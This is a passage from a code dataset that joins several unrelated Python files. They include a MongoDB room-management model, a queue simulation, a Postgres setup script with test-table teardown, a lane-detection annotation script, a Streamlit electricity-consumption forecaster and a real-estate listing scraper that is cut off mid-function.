\"allowedUsers\":[],\n \"otherUsers\":[],\n \"screenShared\":[],\n \"message\":[]\n })\n # return room code \n return room_code\n\n def get(self, room_name):\n \n room_details=loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_name})))\n if room_details:\n res = {\n \"message\":\"Success\",\n \"data\":{\n \"room\":room_details\n },\n \"status\":True\n }\n\n else:\n res={\n \"message\":\"Room Not Found\",\n \"status\":False\n }\n\n return res\n\n def status(self, room_code, user_id):\n room=loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_code})))\n\n if len(room[\"listeners\"])==10:\n return \"Room is full\"\n\n if user_id in room[\"listeners\"]:\n return \"Listener already exist\"\n\n def getCreator(self, room_code):\n return loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_code})))[\"creator\"]\n\n def storePending(self, room_code, user_id):\n print('storePending')\n listener=self.client.auth.profile.find_one({\"_id\":user_id})\n r=self.client.myspace.pending.find_one({\"id\":room_code})\n if r:\n print('r')\n \n for i in r[\"listeners_pending\"]:\n if i[\"id\"]==user_id:\n return \"User Already Exist in Pending List\"\n\n self.client.myspace.pending.update({\"id\":room_code},\n {\n \"$push\":{\n \"listeners_pending\":{\n \"id\":listener[\"_id\"],\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n }\n }\n }\n )\n\n else:\n print('iserting')\n self.client.myspace.pending.insert_one({\n \"id\":room_code,\n \"listeners_pending\":[{\n \"id\":listener[\"_id\"],\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n }]\n }\n )\n return \"User added to pending list\"\n \n def acceptPending(self, room_code, permitted):\n print('called accept pending')\n\n if not self.client.myspace.rooms.find_one({\"room_code\":room_code}):\n raise \"Invalid Room Code\"\n listeners=[]\n for i in permitted:\n listener=self.client.auth.profile.find_one({\"_id\":i})\n listeners.append({\n \"id\": i,\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n })\n print('checking for status listenrs')\n for i in permitted:\n listener=self.client.auth.profile.find_one({\"_id\":i})\n \n self.client.myspace.pending.update_one({\"id\":room_code},\n {\n \"$pull\":{\n \"listeners_pending\":{\n \"id\": i,\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n }\n }\n }\n )\n for listener in listeners:\n self.client.myspace.rooms.update_one({\"room_code\":room_code},\n {\n \"$push\":{\n \"listeners\":listener\n }\n }\n )\n print('permission added')\n return \"Permission Granted\"\n\n\n def addPublic(self, room_name, user_id):\n listener=loads(dumps(self.client.auth.profile.find_one({\"_id\":user_id})))\n print(listener)\n if not listener:\n print('listners no found')\n return \"Listner Not found\"\n room=loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_name})))\n if not room:\n print('not found room')\n return \"Room not found\"\n \n self.client.myspace.rooms.update_one({\"room_code\":room_name},\n {\n \"$push\":{\n \"listeners\":{\n \"id\":listener[\"_id\"],\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n }\n }\n }\n )\n print('listners added')\n return \"Listener added\" \n\n\n 
def remove_listner(self,profile,room_name):\n listener=loads(dumps(self.client.auth.profile.find_one({\"_id\":profile})))\n if not listener:\n res={\n \"message\":\"User Not Found\",\n \"status\":True\n }\n return res\n data=self.client.myspace.rooms.find_one({\"room_code\":room_name})\n if not data:\n res={\n \"message\":\"Room not found\",\n \"status\":True\n }\n return res\n\n self.client.myspace.rooms.update_one({\"room_code\":room_name},\n {\n \"$pull\":{\n \"listeners\":{\n \"id\":listener[\"_id\"],\n \"name\":listener[\"name\"],\n \"channelName\":listener[\"channel_name\"],\n \"profilePicture\":listener[\"profile_picture\"]\n }\n }\n }\n )\n res={\n \"message\":\"listner Removed from room\",\n \"status\":True\n }\n return res\n\n def getlive_rooms(self):\n return loads(dumps(self.client.myspace.rooms.find( {\"live\":True} )))\n\n def start_room(self,room_name,sdpCandidate,sdpMLineIndex,sdpMid,serverUrl,type):\n room_details = loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_name})))\n if room_details:\n self.client.myspace.rooms.update_one({\"room_code\":room_name} ,{\"$set\": { \"live\":True,\"start_time\":str(datetime.utcnow().timestamp()),\n \"sdpCandidate\":sdpCandidate, \"sdpMLineIndex\":sdpMLineIndex,\"sdpMid\":sdpMid, \"serverUrl\":serverUrl, \"type\":type}})\n res={\n \"message\":\"Room ready to go live\",\n \"status\":True\n }\n else:\n res={\n \"message\":\"Room Not Found\",\n \"status\":False\n }\n return res\n\n def delete(self,room_name):\n room_details = loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_name})))\n if room_details:\n self.client.myspace.rooms.delete_one({\"room_code\":room_name})\n res={\n \"message\":\"Room deleted\",\n \"status\":True\n }\n else:\n res={\n \"message\":\"Room Not Found\",\n \"status\":False\n }\n return res\n\n def save_SDP(self,room_name,profile,sdpCandidate,sdpMLineIndex,sdpMid,serverUrl,type):\n user=self.client.auth.profile.find_one({\"_id\":profile})\n if not user:\n res={\n \"message\":\"User Not Found\",\n \"status\":True\n }\n\n room_details = loads(dumps(self.client.myspace.rooms.find_one({\"room_code\":room_name})))\n if room_details:\n self.client.myspace.rooms.update_one({\"room_code\":room_name},\n {\n \"$pull\":{\n \"listeners\":{\n \"_id\":profile\n }\n }\n })\n self.client.myspace.rooms.update_one({\"room_code\":room_name},\n {\n \"$push\":{\n \"listeners\":{\n \"_id\":profile,\n \"name\":user[\"name\"],\n \"profilePicture\":user[\"profile_picture\"],\n \"channelName\":user[\"channel_name\"],\n \"sdpCandidate\":sdpCandidate, \n \"sdpMLineIndex\":sdpMLineIndex,\n \"sdpMid\":sdpMid, \n \"serverUrl\":serverUrl, \n \"type\":type,\n }\n }\n })\n \n res={\n \"message\":\"Credentials Saved\",\n \"status\":True\n }\n else:\n res={\n \"message\":\"Room Not Found\",\n \"status\":False\n }\n return res\n\n def get_savedrooms(self,profile):\n return loads(dumps(self.client.myspace.savedrooms.find({\"creator\":{\"_id\":profile}})))\n\n\n def token(self, profile):\n print('token found is ',self.client.notifications.tokens.find_one({\"profile\":profile},{\"token\":True})[\"token\"])\n return self.client.notifications.tokens.find_one({\"profile\":profile},{\"token\":True})[\"token\"]\n\n def getPending(self, room_code, user_id):\n return loads(dumps(self.client.myspace.pending.find({\"id\":room_code})))\n\n def getChannelName(self, user_id):\n return self.client.auth.profile.find_one({\"_id\":user_id},{\"channel_name\":True})[\"channel_name\"]\n\n def allRooms(self):\n return 
loads(dumps(self.client.myspace.rooms.find()))\n \n def prevRoomListners(self,user_id):\n \"\"\"\n Get the listners of the previous room of the user\n \"\"\"\n rooms = loads(dumps(self.client.myspace.rooms.find({\"creator._id\": user_id}).sort(\"schedule\", -1).limit(1)))\n listners = []\n if len(rooms) > 0 and len(rooms[0][\"listeners\"]) > 0:\n for users in rooms[0][\"listeners\"]:\n user_profile = self.client.auth.profile.find_one({\"_id\": users[\"id\"]})\n listners.append({\n \"id\": user_profile[\"_id\"],\n \"name\": user_profile[\"name\"],\n \"channelName\": user_profile[\"channel_name\"],\n \"profilePicture\": user_profile[\"profile_picture\"],\n \"follower\": len(user_profile[\"follower\"]),\n \"following\": len(user_profile[\"following\"]),\n \"area_of_expert\": user_profile[\"area_of_expert\"]\n })\n return listners\n\n return []\n \n \n def uploadThumbnail(self, room_code, file):\n\n try:\n self.client.myspace.rooms.update_one({\"room_code\":room_code},{\"$set\":{\"thumbnail\":file}})\n return True\n except:\n return False\n \n def close(self):\n self.client.close()\n","repo_name":"ranshu1601/backend-rooms-testing","sub_path":"rooms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31791103554","text":"\"\"\"\r\nModel to simulate customer service with customers arriving interval following Poisson distribution (rate=1)\r\nand service times following Exponential distribution. Each customer has a patience (uniformly distributed)\r\nand does not wait longer than the patience interval.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\ndef Served(arr, ser, pat):\r\n\r\n time_counter=0\r\n time_last_customer=0\r\n customer_wait_times = {}\r\n customer_total_time = {}\r\n served = {}\r\n for customer in range(len(arr)):\r\n time_counter+=arr[customer]\r\n wait = max(0,time_last_customer-arr[customer])\r\n\r\n if wait>pat[customer]:\r\n served[customer+1] = 0\r\n ser[customer] = 0\r\n customer_total_time[customer+1] = pat[customer]\r\n time_last_customer = wait - arr[customer]\r\n else:\r\n served[customer+1] = 1\r\n service_time = ser[customer]\r\n\r\n time_last_customer = service_time + wait\r\n customer_total_time[customer+1] = wait + service_time\r\n\r\n\r\n customer_wait_times[customer+1] = wait\r\n # customer_total_time[customer+1] = wait + service_time\r\n\r\n\r\n return customer_wait_times, customer_total_time, served\r\n\r\n\r\narrival_mean = 1\r\nservice_mean = 2\r\nl = 1/service_mean\r\n\r\nsimulations = 1000\r\nwait50=0\r\ntotal50=0\r\nserved50=0\r\nm = 500\r\nfor s in range(simulations):\r\n if s%100==0:\r\n print('Simulation cycles completed:',s)\r\n\r\n arr = np.random.poisson(1, m)\r\n ser = np.random.exponential(l, m)\r\n pat = np.random.uniform(0.3, 0.7, m)\r\n\r\n wait, total, served = Served(arr, ser, pat)\r\n wait50+=wait[50]\r\n total50+=total[50]\r\n served50+=served[50]\r\n\r\n\r\nd = {'CustomerNo':wait.keys(),\r\n 'ArrivalTime':arr,\r\n 'ServiceTime':ser,\r\n 'Patience': pat,\r\n 'WaitTime':wait.values(),\r\n 'TotalTime':total.values(),\r\n 'Served':served.values()}\r\ndf = pd.DataFrame(d)\r\ndf.to_csv('simulation.csv', index=False)\r\nprint('Average Service time of the 50th customer is:',total50/1000)\r\nprint('Average Wait time of the 50th customer is:',wait50/1000)\r\nprint('Probability of the 50th customer being served is:', 
served50/1000)","repo_name":"nsus1103/simulation","sub_path":"customer-service-simulation.py","file_name":"customer-service-simulation.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33866774883","text":"\"\"\"\nThis module sets up the database that will be used\n\"\"\"\nfrom contextlib import closing\nfrom flask import current_app\nimport psycopg2\nimport os\nfrom app import create_app\n\n\ndef init_db():\n \"\"\"Set up the database to stode the user data\n \"\"\"\n db_url = current_app.config['DATABASE_URL']\n # import pdb;pdb.set_trace()\n conn = psycopg2.connect(db_url)\n with conn as conn, conn.cursor() as cursor:\n with current_app.open_resource('stackovflow.sql', mode='r') as sql:\n cursor.execute(sql.read())\n conn.commit()\n return conn\n\n\ndef connect_to(url):\n conn = psycopg2.connect(url)\n return conn\n\n\ndef _init_db():\n conn = connect_to(os.getenv('DATABASE_TEST_URL'))\n destroy()\n with conn as conn, conn.cursor() as cursor:\n with current_app.open_resource('stackovflow.sql', mode='r') as sql:\n cursor.execute(sql.read())\n conn.commit()\n return conn\n\n\ndef destroy():\n test_url = os.getenv('DATABASE_TEST_URL')\n conn = connect_to(test_url)\n curr = conn.cursor()\n comments = \"DROP TABLE IF EXISTS comments CASCADE\"\n answers = \"DROP TABLE IF EXISTS answers CASCADE\"\n questions = \"DROP TABLE IF EXISTS questions CASCADE\"\n users = \"DROP TABLE IF EXISTS users CASCADE\"\n queries = [comments, answers, questions, users]\n try:\n for query in queries:\n curr.execute(query)\n conn.commit()\n except:\n print(\"Fail\")\n","repo_name":"ogol254/stackoverflow","sub_path":"app/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"15854338516","text":"import os\nimport random\nimport xml.etree.ElementTree as ET\n\nfrom glob import glob\n\ndef get_classes(classes_path):\n with open(classes_path, encoding='utf-8') as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names, len(class_names)\n\n#--------------------------------------------------------------------------------------------------------------------------------#\n# annotation_mode用于指定该文件运行时计算的内容\n# annotation_mode为0代表整个标签处理过程,包括获得VOCdevkit/VOC2007/ImageSets里面的txt以及训练用的train.txt、val.txt\n# annotation_mode为1代表获得VOCdevkit/VOC2007/ImageSets里面的txt\n# annotation_mode为2代表获得训练用的train.txt、val.txt\n#--------------------------------------------------------------------------------------------------------------------------------#\nannotation_mode = 2\n#-------------------------------------------------------------------#\n# 必须要修改,用于生成train.txt、val.txt的目标信息\n# 与训练和预测所用的classes_path一致即可\n# 如果生成的train.txt里面没有目标信息\n# 那么就是因为classes没有设定正确\n# 仅在annotation_mode为0和2的时候有效\n#-------------------------------------------------------------------#\nclasses_path = 'model_data//lane_classes.txt'\n#--------------------------------------------------------------------------------------------------------------------------------#\n# trainval_percent用于指定(训练集+验证集)与测试集的比例,默认情况下 (训练集+验证集):测试集 = 9:1 \n# train_percent用于指定(训练集+验证集)中训练集与验证集的比例,默认情况下 训练集:验证集 = 9:1 \n# 仅在annotation_mode为0和1的时候有效\n#--------------------------------------------------------------------------------------------------------------------------------#\ntrainval_percent = 0.9\ntrain_percent = 0.9\n\n\ndef 
convert_annotation(VOCdevkit_path, classes, image_id, image_set, list_file):\n in_file = open(os.path.join(VOCdevkit_path, '%s/bbox_annotations/%s.xml'%(image_set, image_id)), encoding='utf-8')\n tree=ET.parse(in_file)\n root = tree.getroot()\n\n # SA(Straight Arrow)\n # LA(Left Arrow)\n # RA(Right Arrow)\n # SLA(Straight-Left Arrow)\n # SRA(Straight-Right Arrow)\n # DM(Diamond)\n # PC(Pedestrian Crossing)\n # JB(Junction Box)\n # SL(Slow)\n # BL(Bus Lane)\n # CL(Cycle Lane)\n\n for obj in root.iter('object'):\n difficult = 0 \n if obj.find('difficult')!=None:\n difficult = obj.find('difficult').text\n cls = obj.find('name').text\n if cls not in classes or int(difficult)==1:\n continue\n cls_id = classes.index(cls)\n xmlbox = obj.find('bndbox')\n b = (int(float(xmlbox.find('xmin').text)), int(float(xmlbox.find('ymin').text)), int(float(xmlbox.find('xmax').text)), int(float(xmlbox.find('ymax').text)))\n list_file.write(\" \" + \",\".join([str(a) for a in b]) + ',' + str(cls_id))\n \ndef get_annotation(data_root):\n random.seed(0)\n #-------------------------------------------------------#\n # 指向VOC数据集所在的文件夹\n # 默认指向根目录下的VOC数据集\n #-------------------------------------------------------#\n VOCdevkit_path = os.path.join(data_root, \"LANEdevkit\")\n\n save_base = os.path.join(data_root, \"LANEdevkit\", \"Detection\")\n if not os.path.exists(save_base):\n os.makedirs(save_base)\n\n VOCdevkit_sets = [('train'), ('test')]\n classes, _ = get_classes(classes_path)\n \n if annotation_mode == 0 or annotation_mode == 2:\n print(\"Generate train.txt and val.txt for train.\")\n for image_set in VOCdevkit_sets: \n image_ids = glob(os.path.join(VOCdevkit_path, image_set, \"images/*.jpg\"))\n if image_set == \"test\":\n list_file = open('%s/Detection/%s.txt'%(VOCdevkit_path, \"val\"), 'w', encoding='utf-8')\n else:\n list_file = open('%s/Detection/%s.txt'%(VOCdevkit_path, image_set), 'w', encoding='utf-8')\n\n for image_id in image_ids:\n image_id = os.path.basename(image_id).split(\".\")[0]\n list_file.write('%s/%s/images/%s.jpg'%(os.path.abspath(VOCdevkit_path),image_set, image_id))\n convert_annotation(VOCdevkit_path, classes, image_id, image_set, list_file)\n list_file.write('\\n')\n list_file.close()\n\n print(\"Generate train.txt and val.txt for train done.\")\n\n\nif __name__ == \"__main__\":\n data_root = '/home/leyan/DataSet/'\n get_annotation(data_root)","repo_name":"Leyan529/pytorch-object-detection","sub_path":"annotation/lane.py","file_name":"lane.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31357857532","text":"'''\nCreated on Aug 11, 2022\n\n@author: Billy Culver\n'''\nfrom scipy.optimize import minimize\nfrom Calculations.UnitDamage import CalcUnitDamage\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef troop_count_con(xyz):\n x=xyz[0]\n y=xyz[1]\n z=xyz[2]\n return x+y+z-75\n\ndef total_damage(troop_counts,t1_boost,t2_boost,t3_boost,enemy_defense,full_troop_damage_boost,enemy_damage_reduction,t1_tpc,t2_tpc,t3_tpc,t1_min,t2_min,t3_min,t1_max,t2_max,t3_max):\n t1_damage=CalcUnitDamage(troop_counts[0]*t1_tpc, t1_tpc, minAttack=t1_min, MaxAttack=t1_max, Buffs=[t1_boost+full_troop_damage_boost], Debuffs=[enemy_damage_reduction], EnemyDefense=enemy_defense, damageType=\"Physical\", AttackRollType='Average')\n t2_damage=CalcUnitDamage(troop_counts[1]*t2_tpc, t2_tpc, minAttack=t2_min, MaxAttack=t2_max, Buffs=[t2_boost+full_troop_damage_boost], Debuffs=[enemy_damage_reduction], 
EnemyDefense=enemy_defense, damageType=\"Physical\", AttackRollType='Average')\n    t3_damage=CalcUnitDamage(troop_counts[2]*t3_tpc, t3_tpc, minAttack=t3_min, MaxAttack=t3_max, Buffs=[t3_boost+full_troop_damage_boost], Debuffs=[enemy_damage_reduction], EnemyDefense=enemy_defense, damageType=\"Physical\", AttackRollType='Average')\n    \n    \n    # print(\"T1:\",troop_counts[0],t1_damage)\n    # print(\"T2:\",troop_counts[1],t2_damage)\n    # print(\"T3:\",troop_counts[2],t3_damage)\n    # print(\"DAMAGE:\",t1_damage+t2_damage+t3_damage)\n    # print()\n    \n    return -(t1_damage+t2_damage+t3_damage)\nif __name__ == '__main__':\n    \n    \n    enemy_defense=0\n    enemy_damage_reduction=0.0\n    full_troop_damage_boost=0.\n    t1_boost=0\n    t2_boost=0.4\n    t3_boost=0.2\n    \n    t1_tpc=100\n    t2_tpc=100\n    t3_tpc=100\n    \n    t1_min=28\n    t1_max=29\n    \n    t2_min=18\n    t2_max=26\n    \n    t3_min=9\n    t3_max=29\n    \n    \n    \n    def_ranges= range(0,150,1)\n    t1s=[]\n    t2s=[]\n    t3s=[]\n    \n    \n    \n    for enemy_defense in def_ranges:\n        const_args=(t1_boost,t2_boost,t3_boost, enemy_defense,full_troop_damage_boost,enemy_damage_reduction,t1_tpc,t2_tpc,t3_tpc,t1_min,t2_min,t3_min,t1_max,t2_max,t3_max)\n        min_results=minimize(total_damage,x0=[25,25,25],args=const_args,constraints = {'type':'eq', 'fun': troop_count_con},bounds=[(0,75),(0,75),(0,75)])\n        \n        comm_counts=np.round(min_results.x)\n        \n        \n        sm=np.sum(comm_counts)\n        if(sm>75):\n            comm_counts[np.argmax(comm_counts)]-=1\n        elif(sm<75):\n            comm_counts[np.argmin(comm_counts)]+=1\n            \n        sm=np.sum(np.round(comm_counts))\n        print(comm_counts,sm)\n        t1s.append(comm_counts[0])\n        t2s.append(comm_counts[1])\n        t3s.append(comm_counts[2])\n    plt.plot(def_ranges,t1s,label='Sentinels')\n    plt.plot(def_ranges,t2s,label='Sharpshooters')\n    plt.plot(def_ranges,t3s,label='Master Throwers')\n    plt.legend()\n    plt.show()\n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    ","repo_name":"billbo100/LOTR-RiseToWar-Simulator","sub_path":"quick_maximize.py","file_name":"quick_maximize.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"30719278517","text":"import datetime\nfrom sources.data_analysis import display_consumption_daily\nfrom sources.featuring import create_datetime_features\nfrom sources.data_getter import load_dataset\nfrom sources.featuring import add_consumption_average\nfrom prediction import test_prediction\nfrom sources.model import split\nfrom viems.my_data import my_data_with_another_feautures\nimport streamlit as st\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#Format the date\ndef process_date(date):\n    if date.year > 2017:\n        new_date = date.replace(year=2017)\n    else:\n        new_date = date\n    return new_date\n\n#Combine the date and the time\ndef combine_date_and_time(date, time):\n    datetime_str = f\"{date} {time}\"\n    return datetime_str \n\n#format the prediction \ndef prediction_model(predict):\n    if len(predict)==0:\n        return 0\n    else:\n        return predict[0]\n\n\ndef get_feature_and_predict():\n\n    #Create the test data \n    data= my_data_with_another_feautures()\n    database_train, database_test=split(data, alpha=.8)\n    #Get DateTime columns for prediction dataframe \n    prediction=pd.DataFrame(database_test[\"DateTime\"])\n\n    database_test.set_index(\"DateTime\",inplace=True)\n    database_train.set_index(\"DateTime\",inplace=True)\n    \n    #Detect the targets\n    tag1=database_test[\"Zone 1 Power Consumption\"]\n    tag2=database_test[\"Zone 2 Power Consumption\"]\n    tag3=database_test[\"Zone 3 Power Consumption\"]\n    \n    
\n    database_test=add_consumption_average(database_test, rolling_hours=1)\n    database_train=add_consumption_average(database_train, rolling_hours=1)\n\n    #Reformat the WeekOfYear column\n    database_test['WeekOfYear'] = database_test['WeekOfYear'].astype(int)\n    database_train['WeekOfYear'] = database_train['WeekOfYear'].astype(int)\n\n    database_test.drop([\"Zone 1 Power Consumption\",\"Zone 2 Power Consumption\",\"Zone 3 Power Consumption\"],axis=1,inplace=True)\n    database_train.drop([\"Zone 1 Power Consumption\",\"Zone 2 Power Consumption\",\"Zone 3 Power Consumption\"],axis=1,inplace=True)\n    \n    \n    \n\n    # Center the title\n    predict_value=[]\n    choix_zone= \"ZONE 1\"\n    choix =st.selectbox(\"ZONE DE CONSOMMATION\", [\"ABOMEY-CALAVI\", \"COTONOU\",\"PORTO-NOVO\"]) #User action\n    #Encode the zones \n    if choix == \"ABOMEY-CALAVI\": \n        choix_zone=\"ZONE 1\" \n    elif choix == \"COTONOU\":\n        choix_zone=\"ZONE 2\" \n    else:\n        choix_zone=\"ZONE 3\"\n    \n\n    # Ask the user to enter a date between the minimum and maximum dates\n    min_date = datetime.date(2023, 1, 1)\n    selected_date = st.date_input(\"Sélectionnez une date\", min_value=min_date,)\n    selected_date=process_date(selected_date)\n    #Ask for the time \n    default_time = datetime.time(0, 0)\n    selected_time = st.time_input(\"Sélectionnez une heure\", step=600 ,value=default_time )\n    \n    # Prediction button\n    if st.button(\"Prévision\"):\n        columns=get_feature(database_test=database_test,database_train=database_train,selected_date=selected_date,selected_time=selected_time)\n        predict_value=test_prediction(columns,taget_name=choix_zone)\n    # Create the two columns\n    \n    st.markdown(\n        \"
\"\n \"

Prévision

\"\n f\"

ZONE: {choix}

\"\n f\"

DATE: {selected_date}

\"\n f\"

HEURE: {selected_time}

\"\n f\"

CONSOMMATION : {prediction_model(predict_value)} KW

\"\n \"
\",\n unsafe_allow_html=True\n )\n \n\n\n data = load_dataset(\"../Datasets/Tetuan_City_power_consumption.csv\")\n \n #ajouter denouvelle variable a la data (hour,dayofWeek,Month,Year,DayofYear,WeekOfYear)\n data=create_datetime_features(data)\n #Afficharge par de la consommation par moi\n data.reset_index(inplace=True)\n \n #Recherche ddu jour\n start_date = datetime.date(2017, 1, 1)\n delta = selected_date - start_date \n \n day_num = delta.days\n \n #Texte pour afficharge \n st.markdown(\"

{}

\".format(\"CONSOMMATION PAR INTERVALLE DE TEMPS\"), unsafe_allow_html=True)\n\n #Selction du nombre de jour\n df_sub_data = data[data[\"DayOfYear\"]==day_num]\n \n mask_zone = ['Zone 1 Power Consumption']\n\n fig, ax = plt.subplots(figsize=(15, 7))\n\n for zone in mask_zone:\n ax.plot(df_sub_data['DateTime'], df_sub_data[zone])\n\n ax.set_ylabel(\"Power consumption (KW)\")\n ax.set_xlabel(\"Date\")\n ax.set_title(\"Consommation journalière de la date de prévision\")\n\n st.pyplot(fig)\n \n \n\n\ndef get_feature(database_test,database_train,selected_date,selected_time,zone=1): \n database_test.reset_index(inplace=True)\n database_train.reset_index(inplace=True)\n data_for_col= database_test.loc[(database_test.DateTime == combine_date_and_time(selected_date,selected_time))]\n if data_for_col.shape[0]==0 :\n data_for_col= database_train.loc[(database_train.DateTime == combine_date_and_time(selected_date,selected_time))]\n if zone == 1: \n pass\n data_for_col.drop([\"DateTime\",\"Z2_Mean_Consumption_1H\",\"Z3_Mean_Consumption_1H\"],axis=1,inplace=True)\n return data_for_col\n \n \ndef plot_prediction(df_test, data, tag_name):\n data[\"predictions\"] = test_prediction(feeatures=df_test,taget_name= tag_name)\n fig, ax = plt.subplots()\n ax.plot(data[\"DateTime\"], data[\"predictions\"])\n ax.set_xlabel('Date de consommation')\n ax.set_ylabel('Quantité de consommation')\n ax.set_title('Graphique')\n # Affichage du graphique dans Streamlit\n st.pyplot(fig)\n \n\n \n\nif __name__ == \"__main__\":\n get_feature_and_predict()","repo_name":"oseeJacque/PowerForecast","sub_path":"viems/predictionview.py","file_name":"predictionview.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37332081304","text":"from typing import List\n\n\n\n\ndef get_requirements(file_path:str)-> List[str]:\n\n hepen_e_dot = \"-e .\"\n req_list=[]\n with open(file_path) as obj_file:\n requirements = obj_file.readlines()\n for req in requirements:\n requirements = req.replace(\"\\n\",\"\")\n print(requirements)\n req_list.append(requirements)\n # print(\"Requirement1 is\",req_list)\n\n\n if hepen_e_dot in req_list:\n req_list.remove(hepen_e_dot) \n # print(\"Requirement2 is\",req_list)\n return req_list \n\n\nget_requirements(\"requirements.txt\")","repo_name":"Prashulpoojary/my_project","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22367358534","text":"import csv\nimport os\nimport requests\nimport gspread\nimport pandas as pd\nimport smtplib\nfrom dotenv import load_dotenv\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom pathlib import Path\nfrom urllib.parse import urlparse, parse_qs, urlencode\n\nload_dotenv()\n\nCSV_HEAD_DEFAULT = [\n 'Listing ID',\n 'Listing Name',\n 'Final URL',\n 'Image URL',\n 'City name',\n 'Description',\n 'Price',\n 'Property type',\n 'Listing type',\n 'Contextual keywords',\n 'Address',\n 'Tracking template'\n]\n\n_headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json'\n}\n\nCWD = str(Path(__file__).parent.resolve()) + '/'\n\n\ndef extract_json_al(url, data={}, others={}, verify_ssl=True) -> dict:\n formatted = []\n json = None\n try:\n response = requests.request('GET', url=url, headers=_headers, params=data, verify=verify_ssl)\n generated_url = response.history[0].url if 
response.history else response.url\n print(f\"--> get data from : {generated_url}\")\n json = response.json()\n except requests.exceptions.HTTPError as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n except Exception as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n if not json:\n return {\n 'next': None,\n 'data': formatted\n }\n\n next_url = json['next'] if 'next' in json else None\n results = json['results'] if 'results' in json else []\n\n if not next_url and not results:\n print(json)\n\n parsed_url = urlparse(url)\n base_url = parsed_url.scheme + '://' + parsed_url.netloc\n url_queries = None\n if parsed_url.query:\n url_queries = parse_qs(parsed_url.query)\n\n search_type = data['search_type'] if 'search_type' in data else ''\n rent_min__gt = data['rent_min__gt'] if 'rent_min__gt' in data else ''\n\n if not search_type and url_queries:\n search_type = url_queries['search_type'][0] if 'search_type' in url_queries else ''\n if not rent_min__gt and url_queries:\n rent_min__gt = url_queries['rent_min__gt'][0] if 'rent_min__gt' in url_queries else ''\n\n if not search_type and others:\n search_type = others['search_type'] if 'search_type' in others else ''\n if not rent_min__gt and url_queries:\n rent_min__gt = others['rent_min__gt'] if 'rent_min__gt' in others else ''\n\n country = ''\n currency = ''\n\n if 'realestate.com.kh' in base_url:\n country = 'Cambodia'\n currency = 'USD'\n elif 'hausples.com.pg' in base_url:\n country = 'Papua New Guinea'\n currency = 'PGK'\n\n for row in results:\n try:\n if not row['images']:\n continue\n\n listing_type = row['listing_type']\n if search_type in ['sale', 'both'] and listing_type == 'rent':\n continue\n if search_type == 'rent':\n if (listing_type == 'sale' or listing_type == 'sale/rent'):\n continue\n if (rent_min__gt and int(row['rent_min']) <= int(rent_min__gt)):\n continue\n\n features = []\n if row['bedrooms']:\n features.append(f\"{row['bedrooms']} bed\")\n if row['bathrooms']:\n features.append(f\"{row['bathrooms']} bath\")\n headline = row['headline_en'].strip()\n if headline.startswith('\"') and headline.endswith('\"'):\n headline = headline[1:-1]\n description = ', '.join(features)\n image_url = row['images'][0]['url']\n price = row['price_min'] if row['listing_type'] in ['sale', 'sale/rent'] else row['rent_min']\n if price:\n price = f\"{price:,} {currency}\"\n\n listing = [\n row['id'],\n headline,\n base_url + row['url'],\n image_url,\n f\"{row['address_locality']}, {row['address_subdivision']}\",\n description,\n price,\n row['category_name'],\n listing_type,\n f\"{headline} for {listing_type} in {row['address_line_2']} ID {row['id']}\",\n f\"{row['address_locality']}, {row['address_subdivision']}, {country}\"\n ''\n ]\n formatted.append(listing)\n except Exception as e:\n print('--------------------- begin : error ---------------------')\n print(e)\n for k,v in row.items():\n if k not in [\n 'id',\n 'headline_en',\n 'url',\n 'listing_type',\n 'bedrooms',\n 'bathrooms',\n 'images',\n 'price_min',\n 'rent_min',\n 'address_locality',\n 'address_subdivision',\n 'category_name',\n 'address_line_2'\n ]:\n continue\n print(f\"{k} : {v}\")\n print('--------------------- end : error ---------------------')\n\n print(f\"...{len(formatted):,} data read\")\n\n return {\n 'next': next_url,\n 'data': formatted\n }\n\n\ndef extract_json_appr(url, data={}, others={}, verify_ssl=True) -> dict:\n formatted = []\n json = None\n try:\n response = requests.request('GET', url=url, headers=_headers, params=data, 
